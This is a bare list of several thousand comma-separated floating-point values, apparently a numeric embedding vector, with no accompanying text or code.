-0.016146760433912277, 0.009112527593970299, -0.020899226889014244, 0.021349765360355377, 0.003993089310824871, 0.015376482158899307, -0.003949488513171673, -0.007146866992115974, 0.007401203736662865, 0.006739927921444178, -0.030985500663518906, 0.013574323616921902, -0.022774051874876022, -0.024009402841329575, -0.003931321669369936, 0.022992055863142014, 0.028180528432130814, 0.024837814271450043, -0.02361699752509594, 0.05397755652666092, 0.02360246330499649, -0.02953214757144451, -0.007175934035331011, 0.004563530441373587, 0.0023398995399475098, -0.012796779163181782, 0.029125208035111427, -0.007782709319144487, 0.005086738150566816, -0.013399921357631683, 0.013319986872375011, 0.029401345178484917, -0.0032536955550312996, -0.0035552664194256067, 0.01130709145218134, -0.006234887521713972, 0.012033768929541111, -0.026262100785970688, -0.010347878560423851, 0.04322274029254913, 0.002047412097454071, -0.0017158656846731901, -0.019402271136641502, -0.01975107751786709, -0.03496769070625305, 0.011234424076974392, 0.03086923249065876, -0.001239892328158021, -0.013516189530491829, -0.0045780641958117485, 0.013959462754428387, 0.011241691187024117, 0.0003553903952706605, -0.023268193006515503, -0.03871734440326691, -0.024300074204802513, 0.04258326441049576, -0.0022290812339633703, 0.020158015191555023, 0.015652619302272797, -0.025302888825535774, 0.02491048164665699, 0.03351433575153351, 0.018995333462953568, -0.02616036683320999, -0.018472125753760338, -0.027163181453943253, -0.0014851457672193646, -0.007437537424266338, 0.012905781157314777, -0.028849070891737938, 0.0014606204349547625, 0.027817189693450928, 0.0038949879817664623, 0.021843906491994858, -0.023500729352235794, -0.00025479108444415033, 0.022149110212922096, -0.005068570841103792, -0.01890813186764717, 0.011343426071107388, -0.006812595296651125, -0.03767092898488045, 0.014366401359438896, 0.05627385526895523, 0.011336158961057663, -0.010965554043650627, -0.0017540162662044168, -0.010166209191083908, 0.0009401381830684841, 0.013007516041398048, 0.01377052627503872, 0.008756455965340137, -0.013734192587435246, 0.01117628999054432, -0.019373204559087753, 0.037234921008348465, -0.020841091871261597, 0.014359134249389172, -0.016946103423833847, 0.007324902806431055, -0.037438392639160156, 0.010485947132110596, 0.024692479521036148, -0.010188009589910507, -0.022410714998841286, 0.0010682150023058057, -0.02255604974925518, -0.008211448788642883, -0.005471876822412014, 0.005497310310602188, -0.003840487217530608, -0.009570334106683731, 0.016669966280460358, 0.004378227982670069, 0.020855626091361046, -0.010478680022060871, -0.0009006251348182559, 0.019271470606327057, -0.019765609875321388, -0.005660812836140394, -0.01610315963625908, 0.00134707719553262, -0.01866106130182743, 0.0035607165191322565, -0.020332418382167816, -0.024009402841329575, 0.012288105674088001, -0.02982281893491745, -0.015986891463398933, -0.00288309040479362, -0.028209595009684563, 0.002915790770202875, -0.02412567101418972, -0.014722472988069057, -0.022759519517421722, -0.03319459781050682, 0.0004564439004752785, -0.0042910268530249596, -0.006710860878229141, 0.014867808669805527, 0.08603853732347488, -0.011517828330397606, 0.017948918044567108, -0.0068198624067008495, -0.01838492415845394, 0.007571972906589508, 0.014809674583375454, -0.023544330149888992, 0.020361484959721565, -0.014555336907505989, 0.013654258102178574, 0.036450110375881195, -0.0013906778767704964, 0.019910946488380432, 0.010907419957220554, 0.01996907964348793, -0.03185751289129257, -0.016989704221487045, 0.01741117797791958, -0.004621664993464947, 0.010994620621204376, 0.012426174245774746, -0.007146866992115974, -0.005599045194685459, 0.020070815458893776, -0.000578616454731673, -0.0035062157548964024, -0.022381646558642387, -0.05348341539502144, 0.010805685073137283, 0.022962989285588264, 0.001107273856177926, -0.01191023364663124, -0.008618387393653393, -0.0057334802113473415, 0.009257863275706768, 0.02044868655502796, 0.03717678785324097, -0.018602928146719933, -0.014562604017555714, -0.012164570391178131, -0.01815238781273365, -0.012724111787974834, 0.0027395717334002256, -0.016233960166573524, -0.020928293466567993, -0.0031192603055387735, -0.01999814622104168, -0.02751198597252369, 0.006594592239707708, -0.009250596165657043, -0.007688241079449654, -0.004232892766594887, 0.012804046273231506, 0.021320698782801628, 0.00003735573045560159, -0.02305018901824951, -0.004483595956116915, -0.020128948614001274, -0.02623303420841694, -0.002734121633693576, 0.001364335766993463, -0.007615573238581419, -0.004530830308794975, -0.01841399073600769, -0.011764897964894772, -0.03418288007378578, 0.00163593131583184, -0.01975107751786709, 0.019518541172146797, 0.003949488513171673, -0.0005967833567410707, 0.008320449851453304, 0.003444448346272111, -0.015245680697262287, -0.0194749403744936, 0.002348982961848378, 0.010783884674310684, -0.005195739679038525, 0.0016949737910181284, -0.016510097309947014, 0.01741117797791958, -0.012004701420664787, 0.026407437399029732, -0.0002743205113802105, 0.032293520867824554, -0.028136927634477615, 0.002332632662728429, -0.002127346582710743, 0.00434552738443017, -0.030026286840438843, 0.0041892919689416885, 0.013886794447898865, 0.01786171644926071, 0.008618387393653393, 0.022962989285588264, 0.01712050661444664, -0.024547144770622253, -0.029692016541957855, -0.018050653859972954, 0.00268870429135859, 0.005802514497190714, 0.0006808053585700691, -0.006474690977483988, -0.016204893589019775, -0.008364050649106503, -0.0015269297873601317, -0.00856025330722332, -0.007608306594192982, 0.006830762606114149, -0.02697424404323101, 0.023151924833655357, 0.005497310310602188, -0.01208463590592146, -0.006314822006970644, 0.015245680697262287, -0.00551184406504035, -0.018050653859972954, -0.013879528269171715, -0.02694517746567726, -0.015231146477162838, -0.0047851670533418655, 0.023151924833655357, -0.03505489230155945, 0.02409660443663597, 0.004727032966911793, 0.017483845353126526, -0.03223538398742676, 0.024183806031942368, 0.0007934402674436569, 0.004581697750836611, -0.0009106169454753399, 0.01611769199371338, -0.01077661756426096, 0.012854913249611855, -0.012578776106238365, 0.015550884418189526, 0.024765146896243095, 0.0005286574014462531, 0.009788337163627148, -0.0037932530976831913, 0.021393366158008575, -0.003931321669369936, -0.010965554043650627, 0.004806967452168465, -0.0009355964721180499, -0.005359241738915443, -0.0015541801694780588, 0.012288105674088001, 0.01659729890525341, 0.014511737041175365, -0.034880489110946655, 0.017469311133027077, 0.017963452264666557, 0.008974459022283554, -0.019373204559087753, 0.0014224699698388577, -0.003718768712133169, -0.003549816319718957, 0.016277560964226723, 0.007484771776944399, -0.00792804453521967, 0.0207393579185009, -0.0036352009046822786, -0.015594485215842724, 0.018806396052241325, -0.0016368395881727338, -0.02929961122572422, -0.017164107412099838, 0.009301464073359966, 0.023471662774682045, 0.002921240869909525, -0.01528928056359291, -0.0007875360315665603, 0.005006803665310144, 0.020535888150334358, 0.024271007627248764, -0.0002949853951577097, 0.019024400040507317, -0.0038150534965097904, -0.0103987455368042, 0.0012789512984454632, 0.01400306262075901, 0.008007979020476341, -0.011038221418857574, -0.023471662774682045, -0.019009865820407867, -0.011328891851007938, -0.052291665226221085, 0.018762797117233276, 0.01662636548280716, 0.03319459781050682, -0.005646279081702232, -0.010020873509347439, 0.010682149790227413, -0.03299112990498543, 0.00401488970965147, -0.018283190205693245, 0.003471698611974716, -0.00790624413639307, -0.01924240216612816, -0.014053930528461933, -0.008000711910426617, -0.0030193424317985773, 0.009112527593970299, -0.026901576668024063, -0.0015269297873601317, 0.003873187582939863, -0.0004385040665511042, 0.008044312708079815, -0.009148861281573772, 0.004334627650678158, -0.010987354442477226, 0.0037024186458438635, 0.03865920752286911, 0.006765361409634352, -0.01543461624532938, -0.01996907964348793, -0.00440366193652153, -0.00896719191223383, 0.013428987935185432, -0.005882448982447386, -0.004752466455101967, 0.0055663445964455605, -0.011721297167241573, 0.008763723075389862, 0.02052135393023491, -0.009185194969177246, -0.008596586994826794, 0.006714493967592716, -0.03871734440326691, -0.01582702249288559, -0.010035407729446888, 0.0030284258536994457, -0.014729740098118782, -0.0004968653083778918, 0.002961208112537861, -0.0064964909106493, -0.00802977941930294, 0.007412103936076164, 0.02829679660499096, -0.015013143420219421, -0.01764371432363987, -0.022933920845389366, 0.019344137981534004, -0.0002265187940793112, 0.017018772661685944, 0.003035692498087883, -0.010703950189054012, 0.014170198701322079, -0.003953122068196535, -0.006249420810490847, 0.001521479687653482, -0.009177928790450096, -0.010638548992574215, 0.00492323562502861, 0.0033081963192671537, -0.018515726551413536, -0.010028140619397163, -0.010674882680177689, 0.04025789722800255, -0.03159590810537338, -0.009563066996634007, 0.02259965054690838, -0.03685704991221428, 0.025259288027882576, -0.021974708884954453, -0.014228332787752151, -0.015391015447676182, 0.0207974910736084, 0.009563066996634007, 0.0063656894490122795, 0.003934955224394798, 0.005359241738915443, -0.025070350617170334, -0.006118618883192539, -0.009294196963310242, -0.005871548783034086, 0.0034081144258379936, -0.004182025324553251, 0.004974103067070246, 0.045024897903203964, 0.015681685879826546, -0.016437429934740067, -0.012004701420664787, -0.007441170979291201, -0.048106007277965546, -0.01639382913708687, -0.011096355505287647, -0.01142336055636406, 0.00719773443415761, -0.005010436754673719, 0.01608862541615963, -0.0194313395768404, 0.0207538902759552, -0.0006040501175448298, -0.00551184406504035, 0.02879093773663044, 0.00972293596714735, 0.008829123340547085, 0.017512911930680275, 0.04720492660999298, 0.0052793072536587715, 0.010936486534774303, -0.02643650397658348, -0.01735304296016693, -0.03171217814087868, 0.0006367505993694067, 0.016495564952492714, 0.01271684467792511, -0.03400847688317299, -0.001264417776837945, -0.04249606281518936, -0.0038550207391381264, 0.0207829587161541, -0.025026751682162285, -0.02126256562769413, 0.020855626091361046, -0.022207245230674744, 0.0016268477775156498, 0.00906166061758995, -0.031276170164346695, -0.018501192331314087, -0.0002284490328747779, -0.0023235492408275604, 0.00019926841196138412, -0.006075018551200628, -0.001561446930281818, -0.006013250909745693, -0.0071723004803061485, 0.020041747018694878, -0.0013052932918071747, 0.02979375049471855, 0.011815765872597694, -0.024023937061429024, -0.0004714316164609045, 0.010362411849200726, -0.006994264665991068, -0.0009401381830684841, 0.011692230589687824, -0.03188658133149147, 0.023689664900302887, -0.002272681798785925, -0.004948669578880072, 0.013072916306555271, 0.010682149790227413, 0.0029939087107777596, 0.009018059819936752, -0.0021091795060783625, -0.007244968321174383, -0.018733728677034378, -0.003598867217078805, 0.02020161598920822, 0.01922786980867386, 0.022759519517421722, 0.019256936386227608, 0.01180849876254797, 0.0025688025634735823, 0.025753427296876907, -0.01787625066936016, -0.009403198026120663, -0.010551348328590393, -0.01298571564257145, 0.011110888794064522, 0.0020183450542390347, -0.03113083727657795, -0.003764186054468155, 0.008087913505733013, 0.02675624191761017, 0.00856025330722332, 0.01916973479092121, -0.018806396052241325, 0.018806396052241325, -0.01143062673509121, -0.00999180693179369, 0.00023821376089472324, 0.03034602478146553, -0.0363629087805748, -0.03086923249065876, 0.026814375072717667, -0.01022434327751398, -0.005519110709428787, 0.010238876566290855, -0.02101549506187439, 0.00186574284452945, 0.009250596165657043, -0.01637929677963257, -0.008567520417273045, -0.03162497654557228, -0.009955473244190216, 0.012193637900054455, 0.030549494549632072, 0.0018339507514610887, 0.023268193006515503, 0.019605740904808044, -0.0019783778116106987, -0.00596601702272892, 0.0037932530976831913, -0.001618672744370997, -0.005242973566055298, -0.009039860218763351, -0.01258604321628809, -0.0006204003584571183, 0.01347258873283863, 0.008385851047933102, 0.016408363357186317, -0.009497666731476784, -0.024721546098589897, 0.0415368489921093, -0.020579488947987556, 0.012135503813624382, 0.0068634627386927605, -0.03005535528063774, -0.00908346101641655, -0.02227991260588169, -0.014911409467458725, -0.01611769199371338, 0.034095678478479385, 0.026930643245577812, -0.026407437399029732, 0.002870373660698533, -0.01530381478369236, -0.014809674583375454, -0.036159440875053406, -0.004995903465896845, 0.0010754817631095648, -0.021989241242408752, -0.008087913505733013, -0.006024151109158993, 0.01841399073600769, -0.02018708363175392, -0.010144408792257309, -0.0058352150954306126, -0.012767712585628033, 0.011706763878464699, -0.004854201339185238, -0.0006917054997757077, -0.013588856905698776, -0.016219427809119225, 0.00986827164888382, 0.008247782476246357, -0.014439068734645844, 0.02259965054690838, -0.00803704559803009, -0.0019511273130774498, 0.017193173989653587, -0.014700672589242458, 0.0072522349655628204, -0.012927581556141376, -0.0012317172950133681, 0.0440075509250164, 0.005737113766372204, 0.020608555525541306, 0.020346952602267265, 0.010449613444507122, -0.008087913505733013, -0.001224450534209609, 0.0026650873478502035, 0.01362519059330225, -0.00933779776096344, 0.024707013741135597, -0.023791400715708733, 0.011539628729224205, 0.0009346880833618343, 0.017759982496500015, 0.008741922676563263, 0.007608306594192982, -0.001681348541751504, -0.019315071403980255, 0.008574786596000195, -0.00402578990906477, -0.009831937961280346, 0.005308374296873808, -0.005969650112092495, 0.002766821999102831, 0.009831937961280346, -0.013465321622788906, -0.013319986872375011, 0.005475509911775589, 0.007234068121761084, 0.01656823232769966, 0.028209595009684563, -0.0040875570848584175, -0.008334983140230179, -0.0017022405518218875, -0.00016123142268043011, -0.00931599736213684, -0.0036897016689181328, 0.0015977807343006134, -0.015173012390732765, -0.006896163336932659, -0.02307925745844841, -0.01143062673509121, 0.0025887861847877502, 0.020361484959721565, 0.00841491762548685, 0.016931571066379547, 0.010805685073137283, 0.01712050661444664, 0.0025942362844944, -0.008829123340547085, -0.009643001481890678, -0.004599864594638348, -0.020637622103095055, -0.008850923739373684, -0.01870466209948063, -0.018791863694787025, 0.02934321202337742, 0.019649341702461243, -0.0168153028935194, 0.009047126397490501, -0.010544081218540668, -0.002576069440692663, 0.0019456773297861218, 0.002921240869909525, 0.009911872446537018, 0.002841306384652853, 0.004116624593734741, -0.01867559552192688, -0.011525094509124756, -0.004450895823538303, -0.007826309651136398, 0.011924766935408115, -0.015710754320025444, -0.020128948614001274, 0.009257863275706768, 0.015492750331759453, -0.016219427809119225, -0.007128700148314238, -0.012891246937215328, -0.011699497699737549, 0.009541267529129982, -0.005250240210443735, -0.007125066593289375, -0.002441634191200137, 0.005853381939232349, 0.03659544512629509, -0.014519003219902515, 0.009388664737343788, -0.010057207196950912, -0.0009764720452949405, -0.012607843615114689, 0.003050226019695401, 0.024823281913995743, -0.0076010399498045444, -0.01869012787938118, 0.004632564727216959, -0.011626829393208027, -0.012244504876434803, 0.0017594663659110665, 0.007724574767053127, -0.007303102407604456, -0.007644640281796455, -0.0011245324276387691, 0.0036679015029221773, -0.016800768673419952, -0.0006871637888252735, -0.005675346124917269, -0.004429095424711704, 0.003346347017213702, -0.005210272967815399, 0.023951269686222076, 0.030404159799218178, 0.00870558898895979, 0.005573611240833998, 0.013356320559978485, -0.002581519540399313, -0.0084294518455863, 0.0022708652541041374, -0.005268407054245472, 0.009650268591940403, -0.02182937227189541, -0.008400384336709976, 0.014569871127605438, 0.015754353255033493, -0.004945036023855209, 0.01941680535674095, -0.009286929853260517, -0.014562604017555714, 0.006358422338962555, 0.003617034060880542, 0.0038949879817664623, -0.018849996849894524, -0.011103622615337372, -0.015550884418189526, -0.01658276654779911, 0.008792789652943611, -0.0031628611031919718, -0.020913759246468544, -0.008720122277736664, 0.006689060479402542, 0.004396394826471806, -0.030258825048804283, 0.016917036846280098, -0.004298293497413397, 0.003818686818704009, -0.03005535528063774, -0.00771730812266469, -0.0017621914157643914, 0.022628717124462128, 0.01218637079000473, 0.002314465818926692, 0.012295372784137726, 0.0019020766485482454, -0.005206639878451824, -0.014998610131442547, 0.004320093896239996, -0.01866106130182743, -0.002352616284042597, -0.012578776106238365, -0.0043745944276452065, -0.009650268591940403, 0.005940583068877459, -0.002348982961848378, -0.005973283667117357, -0.006881629582494497, -0.012120969593524933, 0.007949844934046268, -0.012760445475578308, -0.03156684339046478, 0.0050722043961286545, -0.00240530027076602, -0.016742635518312454, -0.0038877211045473814, 0.016277560964226723, -0.003268229076638818, -0.0006776261725462973, 0.002214547712355852, -0.004756100010126829, 0.020841091871261597, 0.008066113106906414, -0.011292558163404465, 0.00024116587883327156, -0.017585579305887222, -0.005715313367545605, 0.02751198597252369, -0.021117229014635086, 0.002198197413235903, -0.020841091871261597, -0.01165589690208435, -0.0031537774484604597, -0.0027377549558877945, -0.019068000838160515, -0.016524631530046463, -0.017571046948432922, -0.0026105865836143494, 0.006423823535442352, -0.007840842939913273, -0.0008402201347053051, 0.02674170769751072, -0.0039167883805930614, 0.0026378370821475983, -0.026552772149443626, -0.013334520161151886, -0.01259330939501524, -0.017963452264666557, -0.009483132511377335, 0.01167769730091095, 0.0044763293117284775, 0.011757631786167622, 0.013181918300688267, 0.027046913281083107, -0.021698569878935814, 0.0018375840736553073, -0.00005373434760258533, -0.032584190368652344, -0.02281765267252922, 0.005399208981543779, -0.013937662355601788, 0.006013250909745693, 0.0034081144258379936, 0.006060484796762466, -0.02514301985502243, -0.0052393400110304356, -0.006986998021602631, -0.012971181422472, 0.00010485720122233033, 0.012513375841081142, 0.0033081963192671537, 0.004730666521936655, -0.006587325595319271, 0.006729027722030878, -0.018617460504174232, -0.001404303009621799, -0.01167769730091095, 0.0007643732242286205, -0.006634559482336044, 0.009526733309030533, -0.000017925642168847844, -0.004836034495383501, 0.011147222481667995, 0.023704199120402336, 0.021059095859527588, -0.017469311133027077, -0.003673351602628827, -0.03958935663104057, -0.00790624413639307, 0.008494852110743523, -0.008022512309253216, 0.02493955008685589, 0.005144872236996889, 0.0026269368827342987, 0.007564706262201071, -0.0007053306908346713, -0.01530381478369236, 0.001394311198964715, -0.0097156697884202, 0.0002940770355053246, 0.011234424076974392, -0.0013389020459726453, 0.013392654247581959, 0.009962739422917366, 0.004396394826471806, 0.018820930272340775, -0.013392654247581959, 0.014119330793619156, -0.006383856292814016, 0.010551348328590393, 0.03086923249065876, 0.008276849053800106, -0.021611370146274567, -0.004756100010126829, -0.0019166101701557636, -0.017018772661685944, 0.01140156015753746, 0.013777793385088444, 0.023428061977028847, -0.011496027931571007, -0.02358793094754219, -0.012200904078781605, 0.019271470606327057, 0.005580878350883722, 0.018094252794981003, -0.011038221418857574, -0.000023347332898993045, 0.0012553342385217547, 0.0029920919332653284, -0.0362757071852684, -0.013864994049072266, -0.02874733693897724, 0.022178176790475845, 0.00019029849499929696, -0.007920777425169945, -0.021059095859527588, 0.0019474939908832312, 0.006834395695477724, 0.011590495705604553, 0.010943753644824028, 0.000037384117604233325, 0.005940583068877459, -0.008974459022283554, 0.023907668888568878, -0.0168734360486269, -0.025491824373602867, 0.02355886436998844, -0.016481030732393265, 0.004439995624125004, 0.013007516041398048, -0.0028849071823060513, -0.008204181678593159, 0.005635378882288933, 0.019082535058259964, 0.020041747018694878, 0.025549957528710365, 0.0194894727319479, 0.009446798823773861, -0.00466889888048172, -0.003978555556386709, -0.006507391110062599, -0.01467160601168871, -0.007470238022506237, 0.01438093464821577, 0.015347415581345558, -0.0007829943206161261, 0.011379759758710861, 0.013726925477385521, 0.00005586328188655898, -0.029154274612665176, 0.004040323197841644, -0.018864531069993973, -0.0018484842730686069, -0.007593773305416107, -0.021654970943927765, 0.010682149790227413, 0.04089737311005592, -0.0002968020853586495, -0.013574323616921902, 0.00473429961130023, -0.0004362332110758871, -0.013319986872375011, -0.013588856905698776, -0.01761464774608612, 0.009163395501673222, 0.0041275243274867535, -0.022512448951601982, -0.019518541172146797, 0.025026751682162285, -0.009817404672503471, -0.007026965264230967, 0.003909521270543337, -0.007310369051992893, -0.04461795836687088, -0.02097189426422119, -0.004389128182083368, 0.019562140107154846, 0.01065308228135109, 0.014162931591272354, -0.006463790778070688, 0.001227175584062934, -0.00019222873379476368, -0.005678979679942131, 0.016292095184326172, -0.0048651015385985374, 0.009301464073359966, -0.01530381478369236, 0.0018112420802935958, -0.005228439811617136, 0.009206995368003845, 0.022178176790475845, 0.006038684863597155, -0.0013825027272105217, 0.00024116587883327156, 0.02722131460905075, -0.008850923739373684, 0.018762797117233276, -0.016960637643933296, -0.006507391110062599, -0.02438727580010891, 0.009025326929986477, -0.027105046436190605, -0.005748013965785503, -0.009170661680400372, 0.008974459022283554, -0.01841399073600769, -0.03502582386136055, -0.02001268044114113, -0.015173012390732765, -0.013334520161151886, -0.0037968866527080536, 0.005689879879355431, -0.022744985297322273, -0.003724218811839819, 0.012011968530714512, 0.01787625066936016, -0.023791400715708733, -0.030404159799218178, -0.004287393298000097, -0.007132333237677813, -0.013298186473548412, -0.01764371432363987, 0.0070669325068593025, -0.009359598159790039, -0.019315071403980255, 0.01761464774608612, 0.016495564952492714, -0.005468243267387152, 0.0045126634649932384, -0.016175827011466026, -0.010791150853037834, -0.0023235492408275604, 0.0019783778116106987, -0.0031410607043653727, 0.011234424076974392, -0.011234424076974392, -0.012150037102401257, -0.01581248827278614, -0.021843906491994858, 0.00532290805131197, -0.006841662339866161, 0.007775442209094763, 0.024576211348176003, 0.004160224925726652, 0.007986178621649742, 0.028136927634477615, 0.0051739392802119255, -0.004672531969845295, -0.02027428336441517, 0.00041011825669556856, -0.042670466005802155, -0.013683324679732323, 0.0233117938041687, -0.01922786980867386, -0.021872973069548607, 0.009701135568320751, -0.005530010908842087, 0.01767278090119362, 0.019329603761434555, 0.007680974435061216, 0.012804046273231506, -0.013152850791811943, -0.0016822569305077195, 0.002634203527122736, -0.013973996043205261, 0.029241476207971573, 0.03453168272972107, 0.008850923739373684, 0.015725286677479744, 0.00409119063988328, -0.0003626571560744196, 0.018108787015080452, -0.0110018877312541, 0.01142336055636406, -0.010042673908174038, 0.015681685879826546, 0.011743097566068172, 0.017440244555473328, 0.010231610387563705, -0.011815765872597694, 0.025782493874430656, 0.00232899934053421, -0.009163395501673222, -0.0010218892712146044, 0.004301927052438259, -0.006852562539279461, 0.014940476045012474, 0.00803704559803009, -0.018602928146719933, -0.01207736972719431, -0.0006749011226929724, 0.011997435241937637, 0.016728101298213005, 0.009359598159790039, -0.012600576505064964, 0.005428276024758816, 0.018835464492440224, -0.01129982527345419, 0.037205856293439865, -0.006398389581590891, -0.010435079224407673, 0.0017149574123322964, 0.00149150425568223, 0.009570334106683731, 0.011750364676117897, -0.0020637621637433767, -0.029880952090024948, 0.01656823232769966, -0.00805884599685669, -0.0084076514467597, 0.004915968980640173, -0.022483382374048233, 0.004018522799015045, 0.008770989254117012, -0.004007623065263033, -0.006870729848742485, -0.006035051308572292, -0.025738894939422607, -0.0010763900354504585, 0.0017476577777415514, 0.015638085082173347, 0.01741117797791958, 0.003268229076638818, -0.001234442344866693, 0.005068570841103792, -0.015449149534106255, -0.027090512216091156, 0.00946859922260046, -0.016989704221487045, 0.023762332275509834, 0.014191999100148678, -0.013843193650245667, -0.018719196319580078, -0.011169022880494595, 0.00997000653296709, 0.019765609875321388, 0.010856552049517632, 0.012200904078781605, -0.01231717225164175, 0.009519467130303383, -0.008988992311060429, 0.011474227532744408, 0.011793965473771095, -0.01557995192706585, -0.0017830833094194531, -0.02098642662167549, -0.0033554304391145706, 0.024285539984703064, -0.0009537633741274476, -0.013712392188608646, -0.026814375072717667, -0.004574430640786886, -0.016248494386672974, -0.0097156697884202, -0.018893597647547722, -0.0010582231916487217, -0.019591208547353745, -0.008451252244412899, -0.012273572385311127, 0.007622840348631144, 0.020099882036447525, -0.0006313004996627569, -0.00880732387304306, -0.0064710574224591255, 0.016277560964226723, -0.021378833800554276, 0.016742635518312454, -0.0041892919689416885, 0.033892206847667694, -0.008146047592163086, -0.009788337163627148, -0.025084884837269783, 0.01844305917620659, -0.019373204559087753, 0.01578342169523239, 0.009984539821743965, 0.008225982077419758, -0.004919602070003748, -0.00906166061758995, 0.01919880323112011, 0.0013507106341421604, 0.011466960422694683, 0.00919246207922697, 0.020332418382167816, -0.0012108252849429846, -0.003771452931687236, 0.021073628216981888, -0.004338260740041733, -0.01269504427909851, 0.01050048042088747, 0.005104904994368553, 0.002276315353810787, -0.015609018504619598, -0.008981726132333279, 0.0015396465314552188, -0.003208278212696314, -0.02307925745844841, -0.0042256261222064495, -0.017948918044567108, -0.039821892976760864, 0.004033056553453207, 0.005330174695700407, 0.00446906266734004, 0.01193203404545784, -0.01736757718026638, 0.009599401615560055, 0.015245680697262287, 0.02928507700562477, -0.00792804453521967, -0.003876820905134082, 0.004541730508208275, -0.008727389387786388, -0.01635022833943367, -0.012404373846948147, -0.04028696566820145, 0.024794213473796844, 0.005344708450138569, -0.006841662339866161, -0.024300074204802513, -0.003237345488741994, 0.014664338901638985, 0.014715205878019333, -0.01218637079000473, -0.001985644455999136, -0.012665977701544762, -0.025346487760543823, 0.008465785533189774, 0.012767712585628033, 0.023965802043676376, 0.007622840348631144, 0.017222240567207336, 0.004843301139771938, -0.011743097566068172, -0.038775477558374405, 0.015129412524402142, -0.0018602927448228002, 0.01845759153366089, -0.0014460869133472443, -0.01581248827278614, -0.006776261609047651, -0.021611370146274567, 0.015405549667775631, -0.003671534825116396, 0.0018748262664303184, -0.02435820735991001, 0.007146866992115974, -0.0035007656551897526, -0.014584404416382313, -0.018762797117233276, -0.017992518842220306, 0.01036967895925045, -0.01639382913708687, -0.022715918719768524, -0.001853025984019041, 0.027846256271004677, 0.007935311645269394, -0.018486659973859787, -0.0103769451379776, 0.0009746553259901702, 0.01284037996083498, 0.007862643338739872, 0.017018772661685944, -0.010057207196950912, 0.0016577315982431173, -0.005853381939232349, -0.01714957319200039, -0.010028140619397163, -0.03470608592033386, 0.007266768720000982, 0.014170198701322079, 0.0076010399498045444, -0.020550420507788658, -0.017832649871706963, 0.0047197663225233555, 0.013196451589465141, 0.030287891626358032, -0.013545256108045578, 0.008582053706049919, -0.03165404498577118, 0.01636476255953312, -0.009526733309030533, 0.004421828780323267, 0.0010155308991670609, 0.0103769451379776, -0.011764897964894772, 0.0017712748376652598, -0.02121896483004093, -0.001823050552047789, -0.0012626009993255138, -0.01819598861038685, -0.018573859706521034, -0.029168808832764626, -0.005370141938328743, -0.024576211348176003, 0.0123099060729146, -0.008189648389816284, 0.006936130579560995, -0.004367327783256769, -0.01268777810037136, 0.01062401570379734, 0.013952195644378662, -0.019126133993268013, 0.0012435257667675614, -0.022497914731502533, -0.024823281913995743, 0.011445160023868084, 0.01439546886831522, -0.010202542878687382, -0.0005050403997302055, -0.02254151552915573, -0.005406475625932217, 0.001624122727662325, 0.003090193262323737, 0.00803704559803009, -0.006053218152374029, -0.016001423820853233, -0.012295372784137726, 0.02175670489668846, -0.019358672201633453, -0.002178213791921735, -0.00027227672399021685, 0.009512200020253658, -0.02025975100696087, 0.007383036892861128, -0.006245787721127272, 0.003250062232837081, -0.0008542994619347155, 0.007840842939913273, -0.011139956302940845, 0.014620738103985786, 0.021204430609941483, 0.008015246130526066, 0.002132796449586749, 0.004897802136838436, -0.0062239873223006725, 0.011125423014163971, 0.011190823279321194, -0.003484415588900447, 0.006285754963755608, 0.014061196707189083, -0.031537774950265884, -0.000013007799680053722, 0.015129412524402142, 0.0026432869490236044, 0.005907882936298847, 0.014896875247359276, 0.011692230589687824, -0.006801695562899113, -0.006449257023632526, 0.006151319481432438, 0.005221173167228699, 0.022483382374048233, -0.01480240747332573, -0.02255604974925518, 0.0005327449762262404, -0.011198090389370918, -0.006739927921444178, -0.013923128135502338, -0.0042910268530249596, 0.019053466618061066, 0.013814127072691917, -0.0012853096704930067, -0.02617490105330944, 0.0006521924515254796, 0.010318811051547527, -0.00816058088093996, -0.002501585055142641, -0.03272952511906624, 0.002267231699079275, 0.0013043849030509591, 0.0363919772207737, 0.002127346582710743, -0.0005322907818481326, 0.014875074848532677, -0.0005767997354269028, 0.0011426993878558278, -0.012549709528684616, 0.010551348328590393, -0.0028939906042069197, 0.004312827251851559, 0.005450076423585415, -0.013523456640541553, -0.021146295592188835, 0.02235257998108864, 0.0070705655962228775, 0.01791985146701336, -0.013545256108045578, 0.017076905816793442, 0.01244070753455162, 0.01869012787938118, 0.002721404889598489, 0.004381861537694931, -0.033078331500291824, -0.038223203271627426, -0.00019529440032783896, -0.016451964154839516, 0.0014106613816693425, -0.012135503813624382, -0.02044868655502796, -0.0054864101111888885, 0.014475403353571892, 0.056186653673648834, 0.0077027748338878155, -0.008894524537026882, 0.0027268549893051386, 0.0005654453998431563, -0.002715954789891839, -0.0090689267963171, 0.026610907167196274, 0.00792804453521967, -0.009127060882747173, -0.004912335425615311, 0.005969650112092495, -0.003364513861015439, 0.012164570391178131, -0.00006954524724278599, -0.013399921357631683, 0.0007680066046305001, 0.011387025937438011, 0.005210272967815399, 0.012273572385311127, 0.0272503811866045, 0.0037006018683314323, -0.0009664802346378565, -0.00895992573350668, -0.012760445475578308, 0.003317279741168022, -0.007622840348631144, 0.0025978698395192623, 0.0017948917811736465, -0.026625439524650574, 0.0036751681473106146, -0.006387489382177591, 0.012447974644601345, 0.003324546618387103, -0.029939087107777596, -0.009664801880717278, -0.005010436754673719, -0.007840842939913273, -0.00771730812266469, 0.010456879623234272, 0.005726213566958904, 0.011132689192891121, 0.0036570013035088778, 0.014162931591272354, -0.006645459681749344, 0.01012260839343071, -0.0012117336736992002, 0.01309471670538187, 0.004160224925726652, -0.024212872609496117, -0.024053003638982773, 0.0038949879817664623, -0.004247426055371761, -0.029372278600931168, -0.026770776137709618, -0.001574163674376905, -0.024474475532770157, -0.013639724813401699, -0.015245680697262287, 0.009962739422917366, 0.005758914165198803, 0.012215438298881054, 0.03354340419173241, 0.006205820478498936, -0.001032789470627904, -0.00051139882998541, 0.00984647125005722, -0.018079720437526703, -0.0017540162662044168, -0.012506108731031418, -0.013152850791811943, -0.026887044310569763, -0.019344137981534004, -0.010420545935630798, 0.0014806040562689304, 0.010442346334457397, 0.024765146896243095, 0.009984539821743965, 0.000917883706279099, -0.010507747530937195, -0.009286929853260517, 0.009948206134140491, 0.016684500500559807, -0.008981726132333279, -0.015100345015525818, -0.022221777588129044, -0.0010918319458141923, 0.010180742479860783, 0.011060021817684174, 0.0027032378129661083, -0.00974473636597395, 0.009018059819936752, 0.0049268691800534725, 0.02044868655502796, 0.004192925523966551, 0.010638548992574215, 0.01543461624532938, -0.0013116516638547182, -0.008945392444729805, -0.013145584613084793, -0.0027849890757352114, 0.01664089970290661, 0.0011735830921679735, 0.0048687350936234, -0.005646279081702232, 0.011488760821521282, 0.009236062876880169, 